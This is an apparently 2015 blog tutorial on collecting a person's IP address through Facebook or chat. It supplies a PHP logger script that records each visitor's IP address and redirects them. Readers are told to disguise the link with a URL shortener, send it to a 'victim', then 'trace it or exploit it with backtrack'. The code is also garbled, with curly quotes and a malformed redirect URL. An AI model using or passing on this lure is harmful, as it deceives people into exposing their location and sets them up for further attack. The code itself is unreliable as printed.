Friday, January 23, 2015

How to Get the ip adress of any person using facebook or chat


Hello friends Tody Am going to tell you How to Get the ip adress of any person using facebook or chat??

ok .. so after long time my new post is on! way to get ip address of your friend computer from Facebook or other chat services like Gtalk,yahoo,Skype etc…
ohhh .. i know you are thinking that how this possible … but anything is possible in term of computer … but to do something you need a mind  :P ..
ok leave it .. now  i will show you real trick ..
Follow me …. ;)
Step1:- First signup on free hosting site like my3gb, x10Hosting etc…
Step2:- now open text editor in your system and copy paste the following code and save it with .php extension …
<?php
$ip = $_SERVER[‘REMOTE_ADDR’];
$dt = date(“l dS \of F Y h:i:s A”);
$file=fopen(“ip_address.txt”,”a”);
$data = $ip.’ ‘.$dt.”\n”;
fwrite($file, $data);
fclose($file);
header( ‘Location: https://https://smarthack.wordpress.com&#8217;) ;
?> 

ohhh .. now you thinking that, what this code does do ..  nothing just grabbing the ip of your victim .. Step3:- now copy the file url and shorten it with the Services like “bitly” or etc …
Step4:- Send the link which you get to your victim .. and just wait to open it ..
Step5:- now go back and see the ip_address.txt . to get ip…
yup .. so finally you got the ip address … but now what you do with it …
nothing just trace it or exploit it with backtrack …
:) happy hacking :) note:- in case if ip_address.txt was no created automatically .. than create it manually and then try again …

No comments:

Post a Comment